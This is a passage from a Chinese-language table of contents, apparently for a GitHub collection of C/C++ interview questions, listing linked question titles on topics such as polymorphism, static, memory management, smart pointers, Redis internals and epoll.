什么是右值引用,跟左值又有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#446%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8Fa%E5%86%99%E4%B8%A4%E6%AE%B5%E4%BB%A3%E7%A0%81%E7%AC%AC%E4%B8%80%E4%B8%AA%E8%AE%BE%E7%BD%AEa%E7%9A%84bit3%E7%AC%AC%E4%BA%8C%E4%B8%AA%E6%B8%85%E9%99%A4a%E7%9A%84bit%E5%9C%A8%E4%BB%A5%E4%B8%8A%E4%B8%A4%E4%B8%AA%E6%93%8D%E4%BD%9C%E4%B8%AD%E8%A6%81%E4%BF%9D%E6%8C%81%E5%85%B6%E5%AE%83%E4%BD%8D%E4%B8%8D%E5%8F%98) ##### [14.7.1 判断x=x+1,x+=1,x++哪个效率最高?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#448%E5%88%A4%E6%96%ADxx1x1x%E5%93%AA%E4%B8%AA%E6%95%88%E7%8E%87%E6%9C%80%E9%AB%98%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [14.7.2 用变量a定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#449%E7%94%A8%E5%8F%98%E9%87%8Fa%E5%AE%9A%E4%B9%89) ##### [14.7.3 C语言是强类型的语言,这是什么意思?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#450c%E8%AF%AD%E8%A8%80%E6%98%AF%E5%BC%BA%E7%B1%BB%E5%9E%8B%E7%9A%84%E8%AF%AD%E8%A8%80%E8%BF%99%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D) ##### [14.7.4 char 与 int之间的转换](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#450c%E8%AF%AD%E8%A8%80%E6%98%AF%E5%BC%BA%E7%B1%BB%E5%9E%8B%E7%9A%84%E8%AF%AD%E8%A8%80%E8%BF%99%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D) ##### [14.7.5 float(单精度浮点型)和double(双精度浮点型)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#452float%E5%8D%95%E7%B2%BE%E5%BA%A6%E6%B5%AE%E7%82%B9%E5%9E%8B%E5%92%8Cdouble%E5%8F%8C%E7%B2%BE%E5%BA%A6%E6%B5%AE%E7%82%B9%E5%9E%8B) ##### [14.7.6 字符常量](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#453%E5%AD%97%E7%AC%A6%E5%B8%B8%E9%87%8F) ##### [14.7.7 写出bool 、int、 指针变量与“零值”比较的if语句](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#454%E5%86%99%E5%87%BAbool-int-%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [14.7.8 写出float x 与“零值”比较的if语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#455%E5%86%99%E5%87%BAfloat-x-%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [14.7.9 区分 %d, %ld, %lld, %lf, %f](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#456%E5%8C%BA%E5%88%86-d-ld-lld-lf-f) ##### [14.8.1 输出数据问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#457%E8%BE%93%E5%87%BA%E6%95%B0%E6%8D%AE%E9%97%AE%E9%A2%98) ##### [14.8.2 嵌入式系统中经常要用到无限循环,你怎么样用C编写死循环](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#458%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%BB%8F%E5%B8%B8%E8%A6%81%E7%94%A8%E5%88%B0%E6%97%A0%E9%99%90%E5%BE%AA%E7%8E%AF%E4%BD%A0%E6%80%8E%E4%B9%88%E6%A0%B7%E7%94%A8c%E7%BC%96%E5%86%99%E6%AD%BB%E5%BE%AA%E7%8E%AF) ##### [14.8.3 惰性计算方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#459%E6%83%B0%E6%80%A7%E8%AE%A1%E7%AE%97%E6%96%B9%E6%B3%95) ##### [14.8.4 变量的声明和定义有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#460%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.8.5 用预处理指令#define 声明一个常数,用以表明1年中有多少秒(忽略闰年问题)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#461%E7%94%A8%E9%A2%84%E5%A4%84%E7%90%86%E6%8C%87%E4%BB%A4define-%E5%A3%B0%E6%98%8E%E4%B8%80%E4%B8%AA%E5%B8%B8%E6%95%B0%E7%94%A8%E4%BB%A5%E8%A1%A8%E6%98%8E1%E5%B9%B4%E4%B8%AD%E6%9C%89%E5%A4%9A%E5%B0%91%E7%A7%92%E5%BF%BD%E7%95%A5%E9%97%B0%E5%B9%B4%E9%97%AE%E9%A2%98) ##### [14.8.6 写一个“标准”宏MIN,这个宏输入两个参数并返回较小的一个](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#462%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8Fmin%E8%BF%99%E4%B8%AA%E5%AE%8F%E8%BE%93%E5%85%A5%E4%B8%A4%E4%B8%AA%E5%8F%82%E6%95%B0%E5%B9%B6%E8%BF%94%E5%9B%9E%E8%BE%83%E5%B0%8F%E7%9A%84%E4%B8%80%E4%B8%AA) ##### [14.8.7 sizeof和strlen的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#464c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84static%E5%92%8Cc%E4%B8%ADstatic%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.8.8 c语言中的static和C++中static的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#464c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84static%E5%92%8Cc%E4%B8%ADstatic%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.8.9 C++函数中值的传递方式有哪几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#465c%E5%87%BD%E6%95%B0%E4%B8%AD%E5%80%BC%E7%9A%84%E4%BC%A0%E9%80%92%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D) ##### [14.9.1 C++里面是不是所有的动作都是main()引起的?如果不是,请举例。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#466c%E9%87%8C%E9%9D%A2%E6%98%AF%E4%B8%8D%E6%98%AF%E6%89%80%E6%9C%89%E7%9A%84%E5%8A%A8%E4%BD%9C%E9%83%BD%E6%98%AFmain%E5%BC%95%E8%B5%B7%E7%9A%84%E5%A6%82%E6%9E%9C%E4%B8%8D%E6%98%AF%E8%AF%B7%E4%B8%BE%E4%BE%8B) ##### [14.9.2 谈谈对面向对象的认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#467%E8%B0%88%E8%B0%88%E5%AF%B9%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E8%AE%A4%E8%AF%86) ##### [14.9.3 谈谈你对编程规范的理解](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#468%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E7%BC%96%E7%A8%8B%E8%A7%84%E8%8C%83%E7%9A%84%E7%90%86%E8%A7%A3) ##### [14.9.4 面向对象的三大特性](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#469%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E4%B8%89%E5%A4%A7%E7%89%B9%E6%80%A7) ##### [14.9.5 简述多态的原理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#470%E7%AE%80%E8%BF%B0%E5%A4%9A%E6%80%81%E7%9A%84%E5%8E%9F%E7%90%86) ##### [14.9.6 多态的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#471%E5%A4%9A%E6%80%81%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [14.9.7 多态,虚函数,纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#472%E5%A4%9A%E6%80%81%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [14.9.8 重载(overload)、重写(override,有的书也叫做“覆盖”)、重定义(redefinition)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#473%E9%87%8D%E8%BD%BDoverload%E9%87%8D%E5%86%99override%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E9%87%8D%E5%AE%9A%E4%B9%89redefinition%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.9.9 所有的运算符都能重载吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#474%E6%89%80%E6%9C%89%E7%9A%84%E8%BF%90%E7%AE%97%E7%AC%A6%E9%83%BD%E8%83%BD%E9%87%8D%E8%BD%BD%E5%90%97) ##### [15.1.1 用C++设计一个不能继承的类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#475%E7%94%A8c%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E4%B8%8D%E8%83%BD%E7%BB%A7%E6%89%BF%E7%9A%84%E7%B1%BB) ##### [15.1.2 构造函数能否为虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#476%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E5%90%A6%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [15.1.3 在C中用const 能定义真正意义上的常量吗?C++中的const呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#477%E5%9C%A8c%E4%B8%AD%E7%94%A8const-%E8%83%BD%E5%AE%9A%E4%B9%89%E7%9C%9F%E6%AD%A3%E6%84%8F%E4%B9%89%E4%B8%8A%E7%9A%84%E5%B8%B8%E9%87%8F%E5%90%97c%E4%B8%AD%E7%9A%84const%E5%91%A2) ##### [15.1.4 宏和内联(inline)函数的比较?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#478%E5%AE%8F%E5%92%8C%E5%86%85%E8%81%94inline%E5%87%BD%E6%95%B0%E7%9A%84%E6%AF%94%E8%BE%83) ##### [15.1.5 typedef和define由什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#479typedef%E5%92%8Cdefine%E7%94%B1%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [15.1.6 strcat、strncat、strcpy哪些函数会导致内存溢出?如何改进?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#480strcatstrncatstrcpy%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E4%BC%9A%E5%AF%BC%E8%87%B4%E5%86%85%E5%AD%98%E6%BA%A2%E5%87%BA%E5%A6%82%E4%BD%95%E6%94%B9%E8%BF%9B) ##### [15.1.7 简述队列和栈的异同](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#481%E7%AE%80%E8%BF%B0%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E7%9A%84%E5%BC%82%E5%90%8C) ##### [15.1.8 堆和栈的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#482%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.1.9 堆和自由存储区的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#483%E5%A0%86%E5%92%8C%E8%87%AA%E7%94%B1%E5%AD%98%E5%82%A8%E5%8C%BA%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.2.1 什么是内存泄漏?面对内存泄漏有什么避免方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#484%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E9%9D%A2%E5%AF%B9%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E6%9C%89%E4%BB%80%E4%B9%88%E9%81%BF%E5%85%8D%E6%96%B9%E6%B3%95) ##### [15.2.2 链表和数组的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#485%E9%93%BE%E8%A1%A8%E5%92%8C%E6%95%B0%E7%BB%84%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.2.3 结构与联合有和区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#486%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [15.2.4 什么是“引用”?申明和使用“引用”要注意哪些问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#487%E4%BB%80%E4%B9%88%E6%98%AF%E5%BC%95%E7%94%A8%E7%94%B3%E6%98%8E%E5%92%8C%E4%BD%BF%E7%94%A8%E5%BC%95%E7%94%A8%E8%A6%81%E6%B3%A8%E6%84%8F%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98) ##### [15.2.5 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#488%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [15.2.6 STL标准模板库](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#489stl%E6%A0%87%E5%87%86%E6%A8%A1%E6%9D%BF%E5%BA%93) ##### [15.2.7 陷阱题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#490%E9%99%B7%E9%98%B1%E9%A2%98) ##### [15.2.8 一个C++源文件从文本到可执行文件经历的过程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#491%E4%B8%80%E4%B8%AAc%E6%BA%90%E6%96%87%E4%BB%B6%E4%BB%8E%E6%96%87%E6%9C%AC%E5%88%B0%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E7%BB%8F%E5%8E%86%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [15.2.9 #include 的顺序以及尖叫括号和双引号的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#492include-%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%BB%A5%E5%8F%8A%E5%B0%96%E5%8F%AB%E6%8B%AC%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.3.1 进程和线程,为什么要有线程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#493%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%9C%89%E7%BA%BF%E7%A8%8B) ##### [15.3.2 C++11有哪些新特性](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#494c11%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B0%E7%89%B9%E6%80%A7) ##### [15.3.3 malloc的原理,brk系统调用干什么的,mmap呢](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#495malloc%E7%9A%84%E5%8E%9F%E7%90%86brk%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E5%B9%B2%E4%BB%80%E4%B9%88%E7%9A%84mmap%E5%91%A2) ##### [15.3.4 C++的内存管理方式,STL的allocator,最新版本默认使用的分配器](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#496c%E7%9A%84%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%96%B9%E5%BC%8Fstl%E7%9A%84allocator%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E9%BB%98%E8%AE%A4%E4%BD%BF%E7%94%A8%E7%9A%84%E5%88%86%E9%85%8D%E5%99%A8) ##### [15.3.5 hash表的实现,包括STL中的哈希桶长度常数。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#497hash%E8%A1%A8%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8C%85%E6%8B%ACstl%E4%B8%AD%E7%9A%84%E5%93%88%E5%B8%8C%E6%A1%B6%E9%95%BF%E5%BA%A6%E5%B8%B8%E6%95%B0) ##### [15.3.6 hash表如何rehash,怎么处理其中保存的资源](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#498hash%E8%A1%A8%E5%A6%82%E4%BD%95rehash%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86%E5%85%B6%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E8%B5%84%E6%BA%90) ##### [15.3.7 Redis的rehash怎么做的,为什么要渐进rehash,渐进rehash怎么实现的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#499redis%E7%9A%84rehash%E6%80%8E%E4%B9%88%E5%81%9A%E7%9A%84%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%B8%90%E8%BF%9Brehash%E6%B8%90%E8%BF%9Brehash%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [15.3.8 Redis的定时机制怎么实现的,有哪些弊端,你将如何改进这个弊端](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#500redis%E7%9A%84%E5%AE%9A%E6%97%B6%E6%9C%BA%E5%88%B6%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%9C%89%E5%93%AA%E4%BA%9B%E5%BC%8A%E7%AB%AF%E4%BD%A0%E5%B0%86%E5%A6%82%E4%BD%95%E6%94%B9%E8%BF%9B%E8%BF%99%E4%B8%AA%E5%BC%8A%E7%AB%AF) ##### [15.3.9 Redis是单线程的,为什么这么高效](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#501redis%E6%98%AF%E5%8D%95%E7%BA%BF%E7%A8%8B%E7%9A%84%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%99%E4%B9%88%E9%AB%98%E6%95%88)) ##### [15.4.1 Redis的数据类型有哪些,底层怎么实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#502redis%E7%9A%84%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E6%9C%89%E5%93%AA%E4%BA%9B%E5%BA%95%E5%B1%82%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0) ##### [15.4.2 Redis和memcached的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#503redis%E5%92%8Cmemcached%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.4.3 TCP的模型,状态转移](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#504tcp%E7%9A%84%E6%A8%A1%E5%9E%8B%E7%8A%B6%E6%80%81%E8%BD%AC%E7%A7%BB) ##### [15.4.4 用过哪些设计模式,单例模式,观察者模式的多线程安全问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#505%E7%94%A8%E8%BF%87%E5%93%AA%E4%BA%9B%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F%E8%A7%82%E5%AF%9F%E8%80%85%E6%A8%A1%E5%BC%8F%E7%9A%84%E5%A4%9A%E7%BA%BF%E7%A8%8B%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98) ##### [15.4.5 用过多线程吗,以前的多线程代码还能怎么优化,线程池的实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#506%E7%94%A8%E8%BF%87%E5%A4%9A%E7%BA%BF%E7%A8%8B%E5%90%97%E4%BB%A5%E5%89%8D%E7%9A%84%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%BB%A3%E7%A0%81%E8%BF%98%E8%83%BD%E6%80%8E%E4%B9%88%E4%BC%98%E5%8C%96%E7%BA%BF%E7%A8%8B%E6%B1%A0%E7%9A%84%E5%AE%9E%E7%8E%B0) ##### [15.4.6 epoll怎么实现的,reactor模型组成](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#507epoll%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84reactor%E6%A8%A1%E5%9E%8B%E7%BB%84%E6%88%90) ##### [15.4.7 线程间的同步方式,最好说出具体的系统调用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#508%E7%BA%BF%E7%A8%8B%E9%97%B4%E7%9A%84%E5%90%8C%E6%AD%A5%E6%96%B9%E5%BC%8F%E6%9C%80%E5%A5%BD%E8%AF%B4%E5%87%BA%E5%85%B7%E4%BD%93%E7%9A%84%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8) ##### [15.4.8 哈希表的桶个数为什么是质数,合数有何不妥?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#509%E5%93%88%E5%B8%8C%E8%A1%A8%E7%9A%84%E6%A1%B6%E4%B8%AA%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF%E8%B4%A8%E6%95%B0%E5%90%88%E6%95%B0%E6%9C%89%E4%BD%95%E4%B8%8D%E5%A6%A5) ##### [15.4.9 C/C++内存有哪几种类型?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#510cc%E5%86%85%E5%AD%98%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E7%B1%BB%E5%9E%8B) ##### [15.5.1 堆和栈的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#511%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.5.2 堆和自由存储区的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#512%E5%A0%86%E5%92%8C%E8%87%AA%E7%94%B1%E5%AD%98%E5%82%A8%E5%8C%BA%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.5.3 程序编译的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#513%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [15.5.4 计算机内部如何存储负数和浮点数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#514%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%86%85%E9%83%A8%E5%A6%82%E4%BD%95%E5%AD%98%E5%82%A8%E8%B4%9F%E6%95%B0%E5%92%8C%E6%B5%AE%E7%82%B9%E6%95%B0) ##### [15.5.5 函数调用的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#515%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [15.5.6 左值和右值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#516%E5%B7%A6%E5%80%BC%E5%92%8C%E5%8F%B3%E5%80%BC) ##### [15.5.7 什么是内存泄漏?面对内存泄漏和指针越界,你有哪些方法?你通常采用哪些方法来避免和减少这类错误?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#517%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E9%9D%A2%E5%AF%B9%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E5%92%8C%E6%8C%87%E9%92%88%E8%B6%8A%E7%95%8C%E4%BD%A0%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95%E4%BD%A0%E9%80%9A%E5%B8%B8%E9%87%87%E7%94%A8%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95%E6%9D%A5%E9%81%BF%E5%85%8D%E5%92%8C%E5%87%8F%E5%B0%91%E8%BF%99%E7%B1%BB%E9%94%99%E8%AF%AF) ##### [15.5.8 C++11 中有哪些智能指针?shared_ptr 的引用计数是如何实现的?unique_ptr 的unique 是如何实现的?make_shared 和 make_unique 的作用?智能指针使用注意事项?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#518c11-%E4%B8%AD%E6%9C%89%E5%93%AA%E4%BA%9B%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88shared_ptr-%E7%9A%84%E5%BC%95%E7%94%A8%E8%AE%A1%E6%95%B0%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84unique_ptr-%E7%9A%84unique-%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84make_shared-%E5%92%8C-make_unique-%E7%9A%84%E4%BD%9C%E7%94%A8%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E4%BD%BF%E7%94%A8%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9) ##### [15.5.9 C和C++的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#519c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.6.1 int fun() 和 int fun(void)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#520int-fun-%E5%92%8C-int-funvoid%E7%9A%84%E5%8C%BA%E5%88%AB)) ##### [15.6.2 const 有什么用途](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#521const-%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94) ##### [15.6.3 在C中用const 能定义真正意义上的常量吗?C++中的const呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#522%E5%9C%A8c%E4%B8%AD%E7%94%A8const-%E8%83%BD%E5%AE%9A%E4%B9%89%E7%9C%9F%E6%AD%A3%E6%84%8F%E4%B9%89%E4%B8%8A%E7%9A%84%E5%B8%B8%E9%87%8F%E5%90%97c%E4%B8%AD%E7%9A%84const%E5%91%A2) ##### [15.6.4 宏和内联(inline)函数的比较?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#523%E5%AE%8F%E5%92%8C%E5%86%85%E8%81%94inline%E5%87%BD%E6%95%B0%E7%9A%84%E6%AF%94%E8%BE%83) ##### [15.6.5 C++中有了malloc / free , 为什么还需要 new / delete?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#524c%E4%B8%AD%E6%9C%89%E4%BA%86malloc--free--%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E9%9C%80%E8%A6%81-new--delete) ##### [15.6.6 C和C++中的强制类型转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#525c%E5%92%8Cc%E4%B8%AD%E7%9A%84%E5%BC%BA%E5%88%B6%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2) ##### [15.6.7 static 有什么用途](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#526static-%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94) ##### [15.6.8 类的静态成员变量和静态成员函数各有哪些特性?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#527%E7%B1%BB%E7%9A%84%E9%9D%99%E6%80%81%E6%88%90%E5%91%98%E5%8F%98%E9%87%8F%E5%92%8C%E9%9D%99%E6%80%81%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E5%90%84%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E6%80%A7) ##### [15.6.9 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#528%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [15.7.1 头文件中的 ifndef/define/endif 是干什么用的? 该用法和 program once 的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#529%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84-ifndefdefineendif-%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8%E7%9A%84-%E8%AF%A5%E7%94%A8%E6%B3%95%E5%92%8C-program-once-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.7.2 当i是一个整数的时候++i和i++那个更快一点?i++和++i的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#530%E5%BD%93i%E6%98%AF%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%E7%9A%84%E6%97%B6%E5%80%99i%E5%92%8Ci%E9%82%A3%E4%B8%AA%E6%9B%B4%E5%BF%AB%E4%B8%80%E7%82%B9i%E5%92%8Ci%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [15.7.3 指针和引用的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#531%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.7.4 